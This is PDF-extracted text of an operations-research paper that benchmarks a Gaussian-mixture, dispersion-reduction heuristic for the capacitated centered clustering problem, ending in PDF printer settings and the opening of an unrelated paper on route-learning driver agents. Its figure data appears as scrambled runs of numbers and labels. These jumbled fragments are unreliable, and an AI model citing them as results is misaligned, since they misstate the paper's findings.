Nogueira-Lorena (2013), Negreiros & Palhano (2006), (a) Centroid ( ) of cluster k Centroid ( ) of cluster k (b) Figure 4 Clustering with (A) standard EM algorithm and (B) DRG meta-heuristic (modified EM algorithm with decoded and uncompressed CCCP data). Full-size DOI: 10.7717/peerj-cs.332/fig-4 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 10/19 http://dx.doi.org/10.7717/peerj-cs.332/fig-4 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ Palhano, Negreiros & Laporte (2008) and Pereira & Senne (2008) for the CCCP were considered. These methods are the following: � Best-known solutions�. The benchmarks reported in De-Oliveira, Chaves & Nogueira- Lorena (2013) have been used for the assessment of the most efficient methods for the CCCP. For this work, these benchmarks were updated with the best-known results obtained with TS (Fernandes-Muritiba et al., 2012) which is considered as the current state of the art algorithm for the CCCP (Carvalho, Mendes & Azeredo-Chaves, 2017; Pereira & Carvalho, 2017). � Clustering Search (CS). Hybrid method which combines meta-heuristics and local search heuristics in which the search is intensified only in areas of the search space that deserve special attention (promising regions). The main idea of CS is to identify promising areas of the search space by generating solutions through a meta-heuristic and “clustering” them into groups that are further explored with local search heuristics (Chaves & Nogueira-Lorena, 2010; Chaves & Nogueira-Lorena, 2011; De-Oliveira, Chaves & Nogueira-Lorena, 2013). The results reported in De-Oliveira, Chaves & Nogueira-Lorena (2013) were considered for comparison with DRG. � A two-phase heuristic using VNS. The results reported in Negreiros & Palhano (2006) were considered for comparison with DRG. These results were also reviewed by Fernandes-Muritiba et al. (2012) for comparison with TS. Table 1 Libraries of CCCP instances considered for testing and assessment. Instance N K doni1 1,000 6 doni2 2,000 6 doni3 3,000 8 doni4 4,000 10 doni5 5,000 12 doni6 10,000 23 doni7 13,221 30 SJC1 100 10 SJC2 200 15 SJC3a 300 25 SJC4a 402 30 TA25 25 5 TA50 50 5 TA60 60 5 TA70 70 5 TA80 80 7 TA90 90 4 TA100 100 6 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 11/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ � CKMeans (CKM). The results reported in Palhano, Negreiros & Laporte (2008) were considered for comparison with DRG. These results were also reviewed by Chaves & Nogueira-Lorena (2011) for comparison with GA. � Two-Column Generation (TCG). The results reported in Pereira & Senne (2008) were considered for comparison with DRG. � Simulated Annealing (SA) and Genetic Algorithm (GA). CS performs a clustering strategy on solutions generated by a meta-heuristic, and the research in Chaves & Nogueira-Lorena (2010, 2011) reported the comparison of results of the CS method with the SA and GA meta-heuristics respectively. For assessment purposes, (Chaves & Nogueira-Lorena, 2010, 2011) also reported the comparison of results of SA and GA without the CS strategy (e.g., independent performance of SA and GA). These independent results were considered for comparison with DRG. � Tabu-Search (TS). The TS algorithm reported in Fernandes-Muritiba et al. (2012) is currently considered state of the art by Rodrigo de Carvalho et al. for the CCCP (Carvalho, Mendes & Azeredo-Chaves, 2017; Pereira & Carvalho, 2017). The results reported in Fernandes-Muritiba et al. (2012) were considered for comparison with DRG. In order to compute the error, gap or deviation from the updated best-known solutions the error metric presented by Yousefikhoshbakht & Khorram (2012) was considered: Errorð%Þ¼ 100� a�b b � � ; (15) where a is the cost or distance of the best solution found by the algorithm for a given instance while b is the best known solution for the same instance. In this case it is important to mention that the best-known solution is not necessarily the optimal solution due to the NP-hard complexity of the CCCP. Initially, this metric was computed for the DRG, VNS, SA, CS, TS and GA methods because the reference data was available for all sets of instances. DRG vs. VNS-SA-CS-TS-GA Table 2 presents the best results of the DRG meta-heuristic for the considered instances. Information regarding the runs performed by each method to report the best result is also presented when available. Also, information regarding the programing language and the hardware used by the authors of the reviewed methods were also included. As reported in the literature, CS and TS are the most competitive methods to solve the CCCP with a mean error gap of 0.78% and 0.61% respectively (and thus, were considered to update the benchmark solutions). Then, the proposed DRG meta-heuristic stands as the next most competitive method with a mean error gap of 2.58%. The VNS, SA and GA methods show a more significant mean error gap with 4.69%, 13.79% and 7.03% respectively. Also, VNS, SA and GA show a higher variability in performance which is characterized by an increased standard deviation when compared with their mean error gap. The DRG shows a balanced mean and standard deviation, thus its performance is more robust and consistent through all different CCCP instances. Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 12/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ DRG vs. CKM-TCG Tables 3 and 4 present the results of the DRG meta-heuristic for the instances where reference data of the CKM and TCG methods were available. As presented in Table 3, the DRG meta-heuristic is more competitive than the CKM method. Also, as previously observed, the DRG is more consistent. When compared to the TCG method, this is more competitive than the DRG approach even though the error gaps are minimal (less than 1.5%). Error and speed vs. size of the instance Figure 5 presents the graphical review of the error gaps of all methods based on the size of the test instance. TS and CS are located on the x-axis as they are the benchmark methods. It can be observed that, as the size of the instance increases, the error gap of SA, GA and VNS significantly increases. TCG presents very small error gaps with small instances (less than 1,000 points) and CKM reports error gaps comparable to SA for small-medium size instances (less than 5,000 points). In contrast, DRG performs consistently through all instances, decreasing its error gap as the instance grows from medium to large size (up to 13,0221 points). Table 2 Performance of DRG, VNS, SA, CS, TS and GA on CCCP instances when compared to updated Best-known solutions*: (a) MATLAB, Intel CORE i7 at 2.4 GHz and 8 GB RAM, (b) AMD ATHLON at 1.6 GHz and 512 MB RAM, (c) C++, Pentium 4 at 3.0 GHz, (d) C++, Pentium 4 at 3.0 GHz, (e) C++, Intel CORE 2 Quad Q9550 CPU at 2.83 GHz and 4 GB RAM, (f) C++, Pentium 4 at 3.0 GHz. Instance Best known* N K DRG (a) (10 runs) Error (%) VNS (b) Error (%) SA (c) (10 runs) Error (%) CS (d) (20 runs) Error (%) TS (e) (25 runs) Error (%) GA (f) (20 runs) Error (%) TA25 1,251.44 25 5 1,256.62 0.41 1,251.44 0.00 1,273.46 1.76 1,251.44 0.00 1,251.45 0.00 1,273.46 1.76 TA50 4,474.52 50 5 4,476.92 0.05 4,476.12 0.04 4,478.15 0.08 4,474.52 0.00 4,474.52 0.00 4,474.52 0.00 TA60 5,356.58 60 5 5,356.58 0.00 5,356.58 0.00 5,370.05 0.25 5,356.58 0.00 5,356.58 0.00 5,356.58 0.00 TA70 6,240.67 70 5 6,270.45 0.48 6,241.55 0.01 6,267.89 0.44 6,240.67 0.00 6,240.67 0.00 6,267.89 0.44 TA80 5,515.46 80 7 5,748.30 4.22 5,730.28 3.89 5,780.55 4.81 5,730.28 3.89 5,730.28 3.89 5,775.69 4.72 TA90 8,899.05 90 4 9,069.85 1.92 9,103.21 2.29 9,069.85 1.92 9,069.85 1.92 9,069.85 1.92 9,133.35 2.63 TA100 8,102.04 100 6 8,122.36 0.25 8,122.67 0.25 8,153.64 0.64 8,102.04 0.00 8,102.04 0.00 8,189.44 1.08 SJC1 17,359.75 100 10 17,492.77 0.77 17,696.53 1.94 17,363.47 0.02 17,359.75 0.00 17,359.75 0.00 17,363.47 0.02 SJC2 33,181.65 200 15 33,317.03 0.41 33,423.84 0.73 33,458.40 0.83 33,181.65 0.00 33,181.65 0.00 33,324.04 0.43 SJC3a 45,354.38 300 25 46,395.96 2.30 47,985.29 5.80 46,847.61 3.29 45,354.38 0.00 45,356.35 0.00 46,682.60 2.93 SJC4a 61,931.60 402 30 62,701.95 1.24 66,689.96 7.68 64,981.66 4.92 61,931.60 0.00 61,993.66 0.10 65,978.89 6.54 DONI1 3,021.41 1,000 6 3,074.97 1.77 3,021.41 0.00 3,138.67 3.88 3,022.26 0.03 3,025.12 0.12 3,122.02 3.33 DONI2 6,080.70 2,000 6 6,456.14 6.17 6,080.70 0.00 6,985.30 14.88 6,372.81 4.80 6,384.84 5.00 6,394.96 5.17 DONI3 8,343.49 3,000 8 8,911.87 6.81 8,769.05 5.10 9,653.27 15.70 8,438.96 1.14 8,343.49 0.00 8,945.88 7.22 DONI4 10,777.64 4,000 10 11,453.68 6.27 11,516.14 6.85 13,328.16 23.66 10,854.48 0.71 10,777.64 0.00 11,130.16 3.27 DONI5 11,114.67 5,000 12 11,776.59 5.96 11,635.18 4.68 13,920.49 25.24 11,134.94 0.18 11,114.67 0.00 11,341.52 2.04 DONI6 15,610.46 10,000 23 16,362.38 4.82 18,443.50 18.15 29,102.49 86.43 15,722.67 0.72 15,610.46 0.00 19,226.96 23.17 DONI7 18,484.13 13,221 30 18,974.23 2.65 23,478.79 27.02 29,484.66 59.51 18,596.74 0.61 18,484.13 0.00 29,915.77 61.85 Mean= 2.58 Mean= 4.69 Mean= 13.79 Mean= 0.78 Mean= 0.61 Mean= 7.03 StdDev= 2.45 StdDev= 7.18 StdDev= 23.43 StdDev= 1.41 StdDev= 1.48 StdDev= 14.68 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 13/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ Regarding speed, Fig. 6 presents the computational (running) times reported by the reviewed methods. While TS and CS are the benchmark methods, these take over 25,000 s to reach the best-known solution for the largest instance. Note that for these methods, their computational times exponentially increase for instances larger than 6,000 points. In contrast, SA is very consistent with a computational time of approximately 1,000 s through all instances. GA significantly increases for instances larger than 6,000 points (up to 7,000 seconds for the largest instance). However, these methods have the largest error gaps as reviewed in Fig. 5. The speed pattern of DRG is very similar to that of GA, however, as reviewed in Fig. 5, its error gap is the closest to the benchmark methods for instances larger than 6,000 points. Table 3 Performance of DRG and CKM on CCCP instances when compared to Best-known solutions*. Instance DRG Error (%) CKM Error (%) SJC1 1,7492.77 0.77 20,341.34 17.18 SJC2 33,317.03 0.41 35,211.99 6.12 SJC3a 46,395.96 2.30 50,590.49 11.54 SJC4a 62,701.95 1.24 69,283.05 11.87 DONI1 3,074.97 1.77 3,234.58 7.06 DONI2 6,456.14 6.17 6,692.71 10.06 DONI3 8,911.87 6.81 9,797.12 17.42 DONI4 11,453.68 6.27 11,594.07 7.58 DONI5 11,776.59 5.96 11,827.69 6.42 Mean= 3.52 Mean= 10.58 StdDev= 2.70 StdDev= 4.36 Table 4 Performance of DRG and TCG on CCCP instances when compared to Best-known solutions*: (a) MATLAB, Intel CORE i7 at 2.4 GHz and 8 GB RAM, (b) C++, Intel CORE 2 Duo at 2 GHz with 2 GB RAM. Instance DRG (a) Error (%) TCG (b) Error (%) TA25 1,256.62 0.41 1,280.49 2.32 TA50 4,476.92 0.05 4,474.52 0.00 TA60 5,356.58 0.00 5,357.34 0.01 TA70 6,270.45 0.48 6,240.67 0.00 TA80 5,748.30 4.22 5,515.46 0.00 TA90 9,069.85 1.92 8,899.05 0.00 TA100 8,122.36 0.25 8,168.36 0.82 SJC1 17,492.77 0.77 17,375.36 0.09 SJC2 33,317.03 0.41 33,357.75 0.53 SJC3a 46,395.96 2.30 45,379.69 0.06 SJC4a 62,701.95 1.24 61,969.06 0.06 Mean= 1.10 Mean= 0.35 StdDev= 1.28 StdDev= 0.71 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 14/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ 0.02 2.0 2.2 2.0 2.7 2.2 3.0 1.9 2.3 2.2 2.6 2.3 0.4 1.9 3.0 0.15 TA100 TA90 8899.05 9103.21 2.3 9069.85 1.9 TA100 8102.04 8122.67 0.3 8153.64 0.6 4.7 13.8 7.2 23.4 1.53 1.699 doni1 doni2 doni3 doni4 doni5 doni6 doni7 doni6 doni7 TA25 TA50 TA60 TA70 TA80 TA90 TA100 0.00 10.00 20.00 30.00 40.00 50.00 60.00 70.00 80.00 90.00 100.00 0 2000 4000 6000 8000 10000 12000 14000 E rr or G ap (% ) N CKM VNS SA GA DRG TCG SA GA DRG CKM VNS TCG TS/CS (Best-known) Figure 5 Comparison of error gap vs. size of the instance. Full-size DOI: 10.7717/peerj-cs.332/fig-5 6270.45 0.5 TA70 70 0.00 0.01 0.01 0.01 InstanceBest Known TCG % DRG % 10000 0.00 5748.30 4.2 TA80 80 0.05 0.06 0.05 0.05 SJC1 17359.75 17375.36 0.1 17492.77 0.8 13221 0.00 9069.85 1.9 TA90 90 0.03 0.02 0.03 0.02 SJC2 33181.65 33357.75 0.5 33317.03 0.4 8122.36 0.3 TA100 100 0.00 0.01 0.01 0.00 SJC3a 45354.38 45379.69 0.1 46395.96 2.3 25 TA25 2.3213258 2.6 SJC4a 61931.60 61969.06 0.1 62701.95 1.2 50 TA50 0 2.5 TA25 1251.44 1280.49 2.3 1256.62 0.4 60 TA60 0.0141882 0.949 TA50 4474.52 4474.52 0.0 4476.92 0.1 70 TA70 0 TA60 5356.58 5357.34 0.0 5356.58 0.0 80 TA80 0 TA70 6240.67 6240.67 0.0 6270.45 0.5 90 TA90 0 TA80 5515.46 5515.46 0.0 5748.30 4.2 100 TA100 0.8185593 TA90 8899.05 8899.05 0.0 9069.85 1.9 100 SJC1 0.0899206 TA100 8102.04 8168.36 0.8 8122.36 0.3 200 SJC2 0.530715 0.4 1.1 300 SJC3a 0.055805 0.7 1.3 402 SJC4a 0.0604861 1.995 1.167 % % % Normalized Errors max= 85.1 Instances N VNS SA GA DRG TA25 25 0.00 1.76 1.76 0.41 TA50 50 0.04 0.08 0.00 0.05 TA60 60 0.00 0.25 0.00 0.00 TA70 70 0.01 0.44 0.44 0.48 TA80 80 3.89 4.81 4.72 4.22 TA90 90 2.29 1.92 2.63 1.92 TA100 100 0.25 0.64 1.08 0.25 SJC1 100 1.94 0.02 0.02 0.77 SJC2 200 0.73 0.83 0.43 0.41 SJC3a 300 5.80 3.29 2.93 2.30 SJC4a 402 7.68 4.92 6.54 1.24 doni1 1000 0.00 3.88 3.33 1.77 doni2 2000 0.00 14.88 5.17 6.17 doni3 3000 5.10 15.70 7.22 6.81 doni4 4000 6.85 23.66 3.27 6.27 doni5 5000 4.68 25.24 2.04 5.96 doni6 10000 18.15 86.43 23.17 4.82 doni7 13221 27.02 59.51 61.85 2.65 0 5000 10000 15000 20000 25000 30000 35000 40000 0 2000 4000 6000 8000 10000 12000 14000 E xe cu tio n T im e (s ec on ds ) N SA GA DRG TCG CS TS SA GA DRG CS (Best-known) TS TCG Figure 6 Comparison of speed vs. size of the instance. Full-size DOI: 10.7717/peerj-cs.332/fig-6 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 15/19 http://dx.doi.org/10.7717/peerj-cs.332/fig-5 http://dx.doi.org/10.7717/peerj-cs.332/fig-6 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ It is important to mention that this comparison may not be fair due to the differences in the programming language and the hardware used for implementation and testing of all the methods. In order to compare running speed all methods should be tested with the same hardware and be implemented with the same programming language by the same software developer (the developer’s expertise may also affect the speed performance of the software). Due to the difficulty of achieving this task, in practice the comparison is commonly performed on the best results obtained by other methods as performed in Chaves & Nogueira-Lorena (2011) and Fernandes-Muritiba et al. (2012). Running time is measured in order to determine if the proposed method can provide a solution within reasonable time considering standard resources of hardware and software. Due to this situation, the DRG can provide very suitable results (<2.6% error gap) within very reasonable time. CONCLUSIONS AND FUTURE WORK Both, the application of Gaussian probability functions and the EM algorithm have not been explored in the literature as solving techniques for facility location problems (e.g., CCCP). An important aspect for the application of GMMs is the reduction of dispersion to accomplish more efficient clustering and convergence of the EM algorithm. Hence, the proposed DRG meta-heuristic provides important insights about the suitability of these techniques for the CCCP and the challenges to improve its performance. Regarding performance, TS and CS are the most competitive solving methods for the CCCP and thus, were considered as benchmark methods with mean average error of 0.61% and 0.78% respectively. The proposed DRG meta-heuristic performed as the closest best method with a mean error gap smaller than 2.6% and there is evidence than it can provide these results faster when compared to TS and CS for large instances (>6,000 points). Hence, the DRG meta-heuristic can be a suitable alternative when compared to CS and TS regarding time, and a more efficient method when compared to VNS, SA, GA, and CKM. The future work is focused on improving the performance of the DRG based on the following key aspects: � The EM algorithm was found to be functional with up to 30 Gaussian components for the clustering process (see discussion on Section “Dispersion Reduction in GMMs Performance for the CCCP”). In this case the analysis of the Infinite Gaussian Mixture Model described in Rasmussen (2010) may lead to overcome this restriction. � While most optimization methods such as those based on Mixed Integer Linear Programming (MILP) or meta-heuristics are purely quantitative, modeling of qualitative criteria may improve the optimization task. In example, in Hadi-Vencheh & Mohamadghasemi (2013) a methodology that integrated the Analytic Hierarchy Process (AHP) and a Nonlinear Programming Model (NLP) provided very suitable solution for a facility layout problem. Such approach may lead to improve the solving methods for other logistic problems such as the facility location problem. Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 16/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ � Integration with state-of-the-art meta-heuristics such as Migrating Birds Optimization (MBO) (Niroomand et al., 2015) and mat-heuristics (Sartori & Buriol, 2020). ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares that they have no competing interests. Author Contributions � Santiago-Omar Caballero-Morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code and test instances of the considered databases are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.332#supplemental-information. REFERENCES Bishop CM. 2006. Pattern recognition and machine learning. New York: Springer Science and Business Media, LLC. Carvalho R, Mendes G, Azeredo-Chaves F. 2017. A heuristic for the capacitated clustering problem. In: In Proceeding of the XLIX Simposio Brasileiro de Pesquisa Operacional. 1–12. Chaves AA, Correa FA, Lorena LAN. 2007. Clustering search heuristic for the capacitated p-median problem. Advances in Software Computing Series 44:136–143. Chaves AA, Nogueira-Lorena LA. 2010. Clustering search algorithm for the capacitated centered clustering problem. Computers & Operations Research 37(3):552–558 DOI 10.1016/j.cor.2008.09.011. Chaves AA, Nogueira-Lorena LA. 2011. Hybrid evolutionary algorithm for the capacitated centered clustering problem. Expert Systems with Applications 38(5):5013–5018 DOI 10.1016/j.eswa.2010.09.149. De-Oliveira ACM, Chaves AA, Nogueira-Lorena LA. 2013. Clustering search. Pesquisa Operacional 33(1):105–121 DOI 10.1590/S0101-74382013000100007. Fernandes-Muritiba AE, Negreiros M, Gois-Oria HL, Ferreira de Souza M. 2012. A tabu search algorithm for the capacitated centred clustering problem. In: 2012 Congreso Latino- Iberoamericano de Investigacion Operativa (CLAIO)—2012 Simposio Brasileiro de Pesquisa Operacional (SBPO). 2344–2359. Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 17/19 http://dx.doi.org/10.7717/peerj-cs.332#supplemental-information http://dx.doi.org/10.7717/peerj-cs.332#supplemental-information http://dx.doi.org/10.7717/peerj-cs.332#supplemental-information http://dx.doi.org/10.1016/j.cor.2008.09.011 http://dx.doi.org/10.1016/j.eswa.2010.09.149 http://dx.doi.org/10.1590/S0101-74382013000100007 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ Forsyth D. 2012. Lecture notes of CS 498 signals AI: Gaussian classifiers. Illinois: University of Illinois, Urbana-Champaign. Fraley C, Raftery A. 1998. How many clusters? Which clustering method? Answers via model- based cluster analysis. Computer Journal 41(8):578–588 DOI 10.1093/comjnl/41.8.578. Hadi-Vencheh A, Mohamadghasemi A. 2013. An integrated AHP–NLP methodology for facility layout design. Journal of Manufacturing Systems 32(1):40–45 DOI 10.1016/j.jmsy.2012.07.009. Hansen P, Jaumard B. 1997. Cluster analysis and mathematical programming. Mathematical Programming 79:191–215. Herda M. 2015. Combined genetic algorithm for capacitated p-median problem. In: Proc. of the 16th IEEE International Symposium on Computational Intelligence and Informatics, CINTI 2015. Piscataway: IEEE, 151–154. Mahmoodi-Darani N, Ahmadi V, Saadati Eskandari Z, Yousefikhoshbakht M. 2013. Solving the capacitated clustering problem by a combined meta-heuristic algorithm. Journal of Advances in Computer Research 4(1):1–13. McLachlan GF, Rathnayake S. 2014. On the number of components in a Gaussian mixture model. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery 4(5):341–355 DOI 10.1002/widm.1135. Mohamadghasemi A, Hadi-Vencheh A. 2012. An integrated synthetic value of fuzzy judgments and nonlinear programming methodology for ranking the facility layout patterns. Computers & Industrial Engineering 62(1):342–348 DOI 10.1016/j.cie.2011.10.004. Mohammed M, Badruddin M, Mohammed E. 2016. Machine learning: algorithms and applications. Milton Park: CRC Press, Taylor & Francis Group. Negreiros M, Palhano A. 2006. The capacitated centred clustering problem. Computers & Operations Research 33(6):1639–1663 DOI 10.1016/j.cor.2004.11.011. Niroomand S, Hadi-Vencheh A, Sahin R, Vizvari B. 2015. Modified migrating birds optimization algorithm for closed loop layout with exact distances in flexible manufacturing systems. Expert Systems with Applications 42(19):6586–6597 DOI 10.1016/j.eswa.2015.04.040. Palhano A, Negreiros M, Laporte G. 2008. A constrained k-median procedure for the capacitated centered clustering problem. In: Proceeding of the XIV Congreso Latino Ibero Americano de Investigacion de Operaciones, CLAIO 2008. Pereira WM, Carvalho R. 2017. ILS-PR: an efficient heuristic for the capacitated centered clustering problem. Proceeding Series of the Brazilian Society of Computational and Applied Mathematics 5(1):104271–104272. Pereira MA, Senne LF. 2008. A column generation method for the capacitated centred clustering problem. In: Proceedings of the VI ALIO/EURO Workshop on Applied Combinatorial Optimization. 1–6. Radiah S, Hasnah N, Omar M. 2013. An alternative heuristic for capacitated p-median problem (CPMP). In: Proceeding of the 2013 IEEE Business Engineering and Industrial Applications Colloquium, BEIAC 2013. 916–921. Rasmussen C. 2010. The infinite Gaussian mixture model. In: Solla SA, Leen TK, Müller KR, eds. Advances in Neural Information Processing Systems. Vol. 12. Cambridge: MIT Press, 554–560. Sartori CS, Buriol LS. 2020. A study on the pickup and delivery problem with time windows: matheuristics and new instances. Computers & Operations Research 124(2):1–17 DOI 10.1016/j.cor.2020.105065. Theodoridis S, Koutroumbas K. 1979. Pattern recognition. Second Edition. San Diego: Elsevier Academic Press. Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 18/19 http://dx.doi.org/10.1093/comjnl/41.8.578 http://dx.doi.org/10.1016/j.jmsy.2012.07.009 http://dx.doi.org/10.1002/widm.1135 http://dx.doi.org/10.1016/j.cie.2011.10.004 http://dx.doi.org/10.1016/j.cor.2004.11.011 http://dx.doi.org/10.1016/j.eswa.2015.04.040 http://dx.doi.org/10.1016/j.cor.2020.105065 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ Theodoridis S, Koutroumbas K. 2010. An introduction to pattern recognition: a MATLAB approach. Cambridge: Academic Press. Yousefikhoshbakht M, Khorram E. 2012. Solving the vehicle routing problem by a hybrid meta- heuristic algorithm. Journal of Industrial Engineering International 8(11):1–9 DOI 10.1186/2251-712X-8-11. Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 19/19 http://dx.doi.org/10.1186/2251-712X-8-11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.332 Solution strategy based on Gaussian mixture models and dispersion reduction for the capacitated centered clustering problem Introduction Clustering Drg meta-heuristic Results and assessment Conclusions and future work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3gi6ydizojeklalau6r3q7nwju ---- Sharing diverse information gets driver agents to learn faster: an application in en route trip building Sharing diverse information gets driver agents to learn faster: an application in en route trip building Guilherme Dytz dos Santos and Ana L.C. Bazzan Computer Science, UFRGS (Universidade Federal do Rio Grande do Sul), Porto Alegre, RS, Brazil ABSTRACT With the increase in the use of private transportation, developing more efficient ways to distribute routes in a traffic network has become more and more important. Several attempts to address this issue have already been proposed, either by using a central authority to assign routes to the vehicles, or by means of a learning process where drivers select their best routes based on their previous experiences. The present work addresses a way to connect reinforcement learning to new technologies such as car-to-infrastructure communication in order to augment the drivers knowledge in an attempt to accelerate the learning process. Our method was compared to both a classical, iterative approach, as well as to standard reinforcement learning without communication. Results show that our method outperforms both of them. Further, we have performed robustness tests, by allowing messages to be lost, and by reducing the storage capacity of the communication devices. We were able to show that our method is not only tolerant to information loss, but also points out to improved performance when not all agents get the same information. Hence, we stress the fact that, before deploying communication in urban scenarios, it is necessary to take into consideration that the quality and diversity of information shared are key aspects. Subjects Agents and Multi-Agent Systems Keywords Multiagent systems, Reinforcement learning, Route choice INTRODUCTION With the COVID-19 related pandemic, there has been several reports that the use of private transportation means (e.g., individual vehicles) is increasing as people try to avoid public transit as much as possible. This leads to even more congestion and hence makes the question of selecting a route to go from A to B more and more prominent. This is especially the case for commuters, who make a given trip nearly every day and, hence, have the 